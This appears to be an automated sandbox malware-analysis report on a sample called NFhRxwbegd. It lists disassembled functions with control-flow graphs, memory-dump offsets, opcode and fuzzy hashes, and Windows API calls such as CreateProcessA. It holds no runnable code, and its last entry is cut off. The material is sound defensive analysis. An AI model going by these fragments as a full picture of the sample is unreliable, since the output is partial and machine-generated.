                                                                      control_flow_graph 197 6de2cf8-6de2d1d 198 6de2d1f 197->198 199 6de2d24-6de2d62 call 6de32a0 197->199 198->199 201 6de2d68 199->201 202 6de2d6f-6de2d8b 201->202 203 6de2d8d 202->203 204 6de2d94-6de2d95 202->204 203->201 203->204 205 6de30eb-6de30f2 203->205 206 6de2fbd-6de2fc1 203->206 207 6de2e7d-6de2e9b 203->207 208 6de2d9a-6de2d9e 203->208 209 6de2ddb-6de2de4 203->209 210 6de307b-6de30a0 203->210 211 6de2f73-6de2f88 203->211 212 6de2e10-6de2e28 203->212 213 6de2eef-6de2f01 203->213 214 6de30cf-6de30e6 203->214 215 6de2f8d-6de2f91 203->215 216 6de2fed-6de2ff9 203->216 217 6de2eca-6de2eea 203->217 218 6de2f2b-6de2f42 203->218 219 6de2f06-6de2f26 203->219 220 6de2e66-6de2e78 203->220 221 6de2f47-6de2f5c 203->221 222 6de2dc7-6de2dd9 203->222 223 6de30a5-6de30b1 203->223 224 6de2ea0-6de2eac 203->224 225 6de2f61-6de2f6e 203->225 204->205 240 6de2fd4-6de2fdb 206->240 241 6de2fc3-6de2fd2 206->241 207->202 230 6de2da0-6de2daf 208->230 231 6de2db1-6de2db8 208->231 232 6de2de6-6de2df5 209->232 233 6de2df7-6de2dfe 209->233 210->202 211->202 234 6de2e2f-6de2e45 212->234 235 6de2e2a 212->235 213->202 214->202 236 6de2fa4-6de2fab 215->236 237 6de2f93-6de2fa2 215->237 226 6de2ffb 216->226 227 6de3000-6de3016 216->227 217->202 218->202 219->202 220->202 221->202 222->202 238 6de30b8-6de30ca 223->238 239 6de30b3 223->239 228 6de2eae 224->228 229 6de2eb3-6de2ec5 224->229 225->202 226->227 254 6de301d-6de3033 227->254 255 6de3018 227->255 228->229 229->202 245 6de2dbf-6de2dc5 230->245 231->245 247 6de2e05-6de2e0b 232->247 233->247 256 6de2e4c-6de2e61 234->256 257 6de2e47 234->257 235->234 249 6de2fb2-6de2fb8 236->249 237->249 238->202 239->238 242 6de2fe2-6de2fe8 240->242 241->242 242->202 245->202 247->202 249->202 260 6de303a-6de3050 254->260 261 6de3035 254->261 255->254 256->202 257->256 263 6de3057-6de3076 260->263 264 6de3052 260->264 261->260 263->202 264->263
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: f086c9e64fa77dc5777e03d5270788e35d5490834089f6c0a871ff8125095b32
                                                                      • Instruction ID: e45e48ed9d65cc14b61f7c485dbc7ffb65846aaff072cf23862ff0942b3bcba2
                                                                      • Opcode Fuzzy Hash: f086c9e64fa77dc5777e03d5270788e35d5490834089f6c0a871ff8125095b32
                                                                      • Instruction Fuzzy Hash: 25C14474E0420ADFDB54DFA5C4858AEFBB6FF88300B11945AD516AB318D734EA82CF94
                                                                      Function 06DE96C8 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 267 6de96c8-6de96ed 268 6de96ef 267->268 269 6de96f4-6de9725 267->269 268->269 270 6de9726 269->270 271 6de972d-6de9749 270->271 272 6de974b 271->272 273 6de9752-6de9753 271->273 272->270 272->273 274 6de993e-6de9956 272->274 275 6de99bf-6de99c8 272->275 276 6de98ff-6de9912 272->276 277 6de985c-6de9860 272->277 278 6de979c-6de97af 272->278 279 6de995b-6de996d 272->279 280 6de9758-6de979a 272->280 281 6de97f7-6de97fd call 6de9b08 272->281 282 6de97b4-6de97db 272->282 283 6de9972-6de9984 272->283 284 6de98d3-6de98fa 272->284 285 6de9893-6de98a6 272->285 286 6de98ab-6de98c0 272->286 287 6de9828-6de983f 272->287 288 6de9989-6de99a0 272->288 289 6de9844-6de9857 272->289 290 6de98c5-6de98ce 272->290 291 6de99a5-6de99ba 272->291 292 6de97e0-6de97f2 272->292 273->275 274->271 295 6de9914-6de9923 276->295 296 6de9925-6de992c 276->296 293 6de9862-6de9871 277->293 294 6de9873-6de987a 277->294 278->271 279->271 280->271 302 6de9803-6de9823 281->302 282->271 283->271 284->271 285->271 286->271 287->271 288->271 289->271 290->271 291->271 292->271 297 6de9881-6de988e 293->297 294->297 301 6de9933-6de9939 295->301 296->301 297->271 301->271 302->271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TuA$UC;"
                                                                      • API String ID: 0-2071649361
                                                                      • Opcode ID: 6df172c7c096f38e64af555e0fd26f5036402753f0db941b6e92197681f2eb81
                                                                      • Instruction ID: 109e8a5cf2cefeea00aa0f83d4ab978a7cba76640ffa8f5cdd2346765c60d55b
                                                                      • Opcode Fuzzy Hash: 6df172c7c096f38e64af555e0fd26f5036402753f0db941b6e92197681f2eb81
                                                                      • Instruction Fuzzy Hash: 9D9136B4D15209EFDB48DFA6E58059EFBF2EF89350F10A42AE515AB264D7309906CF80
                                                                      Function 06DE96B8 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 305 6de96b8-6de96ed 306 6de96ef 305->306 307 6de96f4-6de9725 305->307 306->307 308 6de9726 307->308 309 6de972d-6de9749 308->309 310 6de974b 309->310 311 6de9752-6de9753 309->311 310->308 310->311 312 6de993e-6de9956 310->312 313 6de99bf-6de99c8 310->313 314 6de98ff-6de9912 310->314 315 6de985c-6de9860 310->315 316 6de979c-6de97af 310->316 317 6de995b-6de996d 310->317 318 6de9758-6de979a 310->318 319 6de97f7-6de97fd call 6de9b08 310->319 320 6de97b4-6de97db 310->320 321 6de9972-6de9984 310->321 322 6de98d3-6de98fa 310->322 323 6de9893-6de98a6 310->323 324 6de98ab-6de98c0 310->324 325 6de9828-6de983f 310->325 326 6de9989-6de99a0 310->326 327 6de9844-6de9857 310->327 328 6de98c5-6de98ce 310->328 329 6de99a5-6de99ba 310->329 330 6de97e0-6de97f2 310->330 311->313 312->309 333 6de9914-6de9923 314->333 334 6de9925-6de992c 314->334 331 6de9862-6de9871 315->331 332 6de9873-6de987a 315->332 316->309 317->309 318->309 340 6de9803-6de9823 319->340 320->309 321->309 322->309 323->309 324->309 325->309 326->309 327->309 328->309 329->309 330->309 335 6de9881-6de988e 331->335 332->335 339 6de9933-6de9939 333->339 334->339 335->309 339->309 340->309
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TuA$UC;"
                                                                      • API String ID: 0-2071649361
                                                                      • Opcode ID: e42e04d8b3e52ff7f8dfc343b1298c34b1644a61293a3621db736ac303ee9cb6
                                                                      • Instruction ID: 80cff506998f18d38821b608411730b06ab7f5b9aef961e73d5dc492a4947063
                                                                      • Opcode Fuzzy Hash: e42e04d8b3e52ff7f8dfc343b1298c34b1644a61293a3621db736ac303ee9cb6
                                                                      • Instruction Fuzzy Hash: BE9158B4D15209EFDB48DFA6E58059EFBF2FF89350F10A02AE515AB264D7349906CF40
                                                                      Function 06DE0B3D Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 632fb7dcf51d61aee09b08818b6929c1c4521e0ea18f3afec2a4f41b54bec172
                                                                      • Instruction ID: b853ee20565c7b9a2af7f187eef05bad2edef25de6029496fcf6681d29803afb
                                                                      • Opcode Fuzzy Hash: 632fb7dcf51d61aee09b08818b6929c1c4521e0ea18f3afec2a4f41b54bec172
                                                                      • Instruction Fuzzy Hash: B3A12675E002098FDB44DFAAC884ADEFBB2EF88310F14942AD455BB358D7349941CFA4
                                                                      Function 06DE0B77 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 6531fad31de58f2fdc8da4339e6d212ecb03851b23566faab64b7de31140a0bf
                                                                      • Instruction ID: 5958f812c20d2275f1f7e92ae37bd5a240b01b68570bcda1fc15a937fbc798b6
                                                                      • Opcode Fuzzy Hash: 6531fad31de58f2fdc8da4339e6d212ecb03851b23566faab64b7de31140a0bf
                                                                      • Instruction Fuzzy Hash: CBA1F274E002198FDB48DFAAC984ADEFBB2FF88300F24942AD515AB358D7749945CF64
                                                                      Function 06DE0B90 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 70330e87c7f5d00849b607e506628ee338b6d36b83de3bba00311e865b28634e
                                                                      • Instruction ID: 0f3601831ad4231b74b064a3e1c5e08385a3a6f6174f6e3c0eb6cedb53e588dd
                                                                      • Opcode Fuzzy Hash: 70330e87c7f5d00849b607e506628ee338b6d36b83de3bba00311e865b28634e
                                                                      • Instruction Fuzzy Hash: 8391D274E002198FDB48DFAAC584AAEFBB2FF88300F24942AD515BB358D7749945CF64
                                                                      Function 06DE8090 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5=6
                                                                      • API String ID: 0-2897083178
                                                                      • Opcode ID: 3c0a5f43197d7920edad795bee1b0a8e1e0343784ecfd24f57b6b44e7e76f871
                                                                      • Instruction ID: cfd5818e7dfa691eb306aba1f491a69dff835231d31a5817e1add8497d263cb3
                                                                      • Opcode Fuzzy Hash: 3c0a5f43197d7920edad795bee1b0a8e1e0343784ecfd24f57b6b44e7e76f871
                                                                      • Instruction Fuzzy Hash: 5D718A75E1621A9FCB44DFA6D8445AEFBF2FF89240F00E52AC026E7254D7389A01CF90
                                                                      Function 06DE80A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5=6
                                                                      • API String ID: 0-2897083178
                                                                      • Opcode ID: 38462da0b8f4385efc7e24590aeb972298f4035903ec0c417dd0399581ab1520
                                                                      • Instruction ID: 0debfcb91b06bfed53c586649d0c72dbbab21115ca8035bca8fe45ab3a0a6e57
                                                                      • Opcode Fuzzy Hash: 38462da0b8f4385efc7e24590aeb972298f4035903ec0c417dd0399581ab1520
                                                                      • Instruction Fuzzy Hash: 08617974E1620A9FCB48DFA6D9444AEFBF2FF89240F00E56AC016E7214D7389A01CF90
                                                                      Function 06DD76B8 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9bf87a4efe3ebd47ba2e1f8fd1f5d6f8791c28b44cc148f828087137e26f021a
                                                                      • Instruction ID: 75b0545279d27b36f159514e46b87702f9019bdc3ec53892897819a4a66e57fb
                                                                      • Opcode Fuzzy Hash: 9bf87a4efe3ebd47ba2e1f8fd1f5d6f8791c28b44cc148f828087137e26f021a
                                                                      • Instruction Fuzzy Hash: ABE1C071B016048FDB65EB79C850BAEB7F6EF88300F1484ADD54ADB291CB74E901CB61
                                                                      Function 06DE1E7A Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60102e19426677a21994f975ddd09e93674c636339c8bfc4dbf214405920d84c
                                                                      • Instruction ID: 2e7cc858dc301c8f853ec65ede4531fbff37db62e0445bf3edb67cfb34d09f17
                                                                      • Opcode Fuzzy Hash: 60102e19426677a21994f975ddd09e93674c636339c8bfc4dbf214405920d84c
                                                                      • Instruction Fuzzy Hash: D33128B1E006188BEB18CFA6D8447DEBBB7AFC8300F14C06AD509A6268DB345A45CF90
                                                                      Function 00DFD4D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD556
                                                                      • GetCurrentThread.KERNEL32 ref: 00DFD593
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD5D0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFD629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 2446929c615dc3a762c9a771610eb862ac0164b20a308a3019dc7adc082334d7
                                                                      • Instruction ID: 9de8f714dca0a68dab70ce22310fa4cd060db38d1116d76a448baaea8182ebb7
                                                                      • Opcode Fuzzy Hash: 2446929c615dc3a762c9a771610eb862ac0164b20a308a3019dc7adc082334d7
                                                                      • Instruction Fuzzy Hash: CA5165B0901349DFDB04DFAAD548BAEBBF2EF88314F20C459E109A7350D7749944CB66
                                                                      Function 00DFD4C9 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD556
                                                                      • GetCurrentThread.KERNEL32 ref: 00DFD593
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD5D0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFD629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 70ef8233eab72bd0dbfeda46793be13ac3cf54862c558f0abb312fa0be015677
                                                                      • Instruction ID: 48040c9a8b282ad80484ab33ba3725f318e234deef8ddebca26256a15a963fbb
                                                                      • Opcode Fuzzy Hash: 70ef8233eab72bd0dbfeda46793be13ac3cf54862c558f0abb312fa0be015677
                                                                      • Instruction Fuzzy Hash: 6D5145B0901349CFDB04DFAAD548BAEBBF2EF88314F24C459D509A73A0D7749984CB66
                                                                      Function 06DD465C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 354 6dd465c-6dd46fd 360 6dd46ff-6dd4709 354->360 361 6dd4736-6dd4756 354->361 360->361 362 6dd470b-6dd470d 360->362 368 6dd478f-6dd47be 361->368 369 6dd4758-6dd4762 361->369 363 6dd470f-6dd4719 362->363 364 6dd4730-6dd4733 362->364 366 6dd471d-6dd472c 363->366 367 6dd471b 363->367 364->361 366->366 370 6dd472e 366->370 367->366 375 6dd47f7-6dd48b1 CreateProcessA 368->375 376 6dd47c0-6dd47ca 368->376 369->368 371 6dd4764-6dd4766 369->371 370->364 373 6dd4789-6dd478c 371->373 374 6dd4768-6dd4772 371->374 373->368 377 6dd4774 374->377 378 6dd4776-6dd4785 374->378 389 6dd48ba-6dd4940 375->389 390 6dd48b3-6dd48b9 375->390 376->375 379 6dd47cc-6dd47ce 376->379 377->378 378->378 380 6dd4787 378->380 381 6dd47f1-6dd47f4 379->381 382 6dd47d0-6dd47da 379->382 380->373 381->375 384 6dd47dc 382->384 385 6dd47de-6dd47ed 382->385 384->385 385->385 386 6dd47ef 385->386 386->381 400 6dd4950-6dd4954 389->400 401 6dd4942-6dd4946 389->401 390->389 403 6dd4964-6dd4968 400->403 404 6dd4956-6dd495a 400->404 401->400 402 6dd4948 401->402 402->400 406 6dd4978-6dd497c 403->406 407 6dd496a-6dd496e 403->407 404->403 405 6dd495c 404->405 405->403 409 6dd498e-6dd4995 406->409 410 6dd497e-6dd4984 406->410 407->406 408 6dd4970 407->408 408->406 411 6dd49ac 409->411 412 6dd4997-6dd49a6 409->412 410->409 414 6dd49ad 411->414 412->411 414->414
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD489E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 48f78ada9ddd84fad1e7dd81427658d327c87988085758f4478eef7d6649b6d7
                                                                      • Instruction ID: c234a5c2cefccb31ada0ac0bce3ab5dcd1081b1b1cd141fa4d8455871e2957d9
                                                                      • Opcode Fuzzy Hash: 48f78ada9ddd84fad1e7dd81427658d327c87988085758f4478eef7d6649b6d7
                                                                      • Instruction Fuzzy Hash: 60A17B70D00219EFEB60DFA9C841BEEBBF2BF49310F148569E858A7240DB749985CF91
                                                                      Function 06DD4668 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 415 6dd4668-6dd46fd 417 6dd46ff-6dd4709 415->417 418 6dd4736-6dd4756 415->418 417->418 419 6dd470b-6dd470d 417->419 425 6dd478f-6dd47be 418->425 426 6dd4758-6dd4762 418->426 420 6dd470f-6dd4719 419->420 421 6dd4730-6dd4733 419->421 423 6dd471d-6dd472c 420->423 424 6dd471b 420->424 421->418 423->423 427 6dd472e 423->427 424->423 432 6dd47f7-6dd48b1 CreateProcessA 425->432 433 6dd47c0-6dd47ca 425->433 426->425 428 6dd4764-6dd4766 426->428 427->421 430 6dd4789-6dd478c 428->430 431 6dd4768-6dd4772 428->431 430->425 434 6dd4774 431->434 435 6dd4776-6dd4785 431->435 446 6dd48ba-6dd4940 432->446 447 6dd48b3-6dd48b9 432->447 433->432 436 6dd47cc-6dd47ce 433->436 434->435 435->435 437 6dd4787 435->437 438 6dd47f1-6dd47f4 436->438 439 6dd47d0-6dd47da 436->439 437->430 438->432 441 6dd47dc 439->441 442 6dd47de-6dd47ed 439->442 441->442 442->442 443 6dd47ef 442->443 443->438 457 6dd4950-6dd4954 446->457 458 6dd4942-6dd4946 446->458 447->446 460 6dd4964-6dd4968 457->460 461 6dd4956-6dd495a 457->461 458->457 459 6dd4948 458->459 459->457 463 6dd4978-6dd497c 460->463 464 6dd496a-6dd496e 460->464 461->460 462 6dd495c 461->462 462->460 466 6dd498e-6dd4995 463->466 467 6dd497e-6dd4984 463->467 464->463 465 6dd4970 464->465 465->463 468 6dd49ac 466->468 469 6dd4997-6dd49a6 466->469 467->466 471 6dd49ad 468->471 469->468 471->471
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD489E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: c88f91847b8eb8bd2b8f2856dd48127f7b23152af95cf76004a6b040f33f36ae
                                                                      • Instruction ID: 3f628e504b9c599312c21f581a5314d4874e12c15cad1dd86710939dad1d1c67
                                                                      • Opcode Fuzzy Hash: c88f91847b8eb8bd2b8f2856dd48127f7b23152af95cf76004a6b040f33f36ae
                                                                      • Instruction Fuzzy Hash: F8918A70D00219DFEB60DFA9C8417EEBBF2BF49310F148169E858A7240DB749985CF91
                                                                      Function 00DFAE48 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 dfae48-dfae57 473 dfae59-dfae66 call dfa1a0 472->473 474 dfae83-dfae87 472->474 479 dfae7c 473->479 480 dfae68 473->480 476 dfae9b-dfaedc 474->476 477 dfae89-dfae93 474->477 483 dfaede-dfaee6 476->483 484 dfaee9-dfaef7 476->484 477->476 479->474 527 dfae6e call dfb0d1 480->527 528 dfae6e call dfb0e0 480->528 483->484 485 dfaf1b-dfaf1d 484->485 486 dfaef9-dfaefe 484->486 491 dfaf20-dfaf27 485->491 488 dfaf09 486->488 489 dfaf00-dfaf07 call dfa1ac 486->489 487 dfae74-dfae76 487->479 490 dfafb8-dfb078 487->490 493 dfaf0b-dfaf19 488->493 489->493 522 dfb07a-dfb07d 490->522 523 dfb080-dfb0ab GetModuleHandleW 490->523 494 dfaf29-dfaf31 491->494 495 dfaf34-dfaf3b 491->495 493->491 494->495 497 dfaf3d-dfaf45 495->497 498 dfaf48-dfaf51 call dfa1bc 495->498 497->498 503 dfaf5e-dfaf63 498->503 504 dfaf53-dfaf5b 498->504 505 dfaf65-dfaf6c 503->505 506 dfaf81-dfaf8e 503->506 504->503 505->506 508 dfaf6e-dfaf7e call dfa1cc call dfa1dc 505->508 513 dfafb1-dfafb7 506->513 514 dfaf90-dfafae 506->514 508->506 514->513 522->523 524 dfb0ad-dfb0b3 523->524 525 dfb0b4-dfb0c8 523->525 524->525 527->487 528->487
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFB09E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 353447a5b72b8477f07b23945b6f52c811d1d8963b3c53206ff40a0a0491c0dc
                                                                      • Instruction ID: 40cabb82472c9cbab58a1ef695725c64094847dfd66c728b8f46c9ed3737ef55
                                                                      • Opcode Fuzzy Hash: 353447a5b72b8477f07b23945b6f52c811d1d8963b3c53206ff40a0a0491c0dc
                                                                      • Instruction Fuzzy Hash: 467159B0A00B098FD724DF29D05176ABBF1FF88304F05892DE58ADBA40DB34E945CBA1
                                                                      Function 00DF5A84 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 529 df5a84-df5b14
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5283ac723bcf585424453ba6ec0acdce3aee61dd737a991c73b4de81af1232f
                                                                      • Instruction ID: 9bb2f909b0db28b65fd4a6fcddcf1323d569aa836a0e0ac391c328f1a32dadd3
                                                                      • Opcode Fuzzy Hash: a5283ac723bcf585424453ba6ec0acdce3aee61dd737a991c73b4de81af1232f
                                                                      • Instruction Fuzzy Hash: 7841DF71801A4DCFDF14CBA8E8453BDBBB0AF46320F258289C345AB259C772A946CF61
                                                                      Function 00DF590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 532 df590d-df598c 534 df598f-df59d9 CreateActCtxA 532->534 536 df59db-df59e1 534->536 537 df59e2-df5a3c 534->537 536->537 544 df5a3e-df5a41 537->544 545 df5a4b-df5a4f 537->545 544->545 546 df5a51-df5a5d 545->546 547 df5a60 545->547 546->547 549 df5a61 547->549 549->549
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 00DF59C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: d6f4c3e709d1b149fa6ac0c9a78a68f75f7566092676be4a3ae1d517e76a79e1
                                                                      • Instruction ID: 877e35d2f1c611761cca7163e54befc3765ae7c2634fe12cb33c38de9ae77629
                                                                      • Opcode Fuzzy Hash: d6f4c3e709d1b149fa6ac0c9a78a68f75f7566092676be4a3ae1d517e76a79e1
                                                                      • Instruction Fuzzy Hash: 0341E0B0C0061DCBEF24CFAAC98479DBBB5BF88314F24815AD508AB255DB716946CF50
                                                                      Function 00DF44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 550 df44b0-df59d9 CreateActCtxA 554 df59db-df59e1 550->554 555 df59e2-df5a3c 550->555 554->555 562 df5a3e-df5a41 555->562 563 df5a4b-df5a4f 555->563 562->563 564 df5a51-df5a5d 563->564 565 df5a60 563->565 564->565 567 df5a61 565->567 567->567
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 00DF59C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 26adf2af938208b5d15edc1837a02bb2eecaf09922a51e026fcd80658b64017e
                                                                      • Instruction ID: c8dd9e629b69b88949e2242bc4f42415bbdf2e4e871679475ad3d9f214113902
                                                                      • Opcode Fuzzy Hash: 26adf2af938208b5d15edc1837a02bb2eecaf09922a51e026fcd80658b64017e
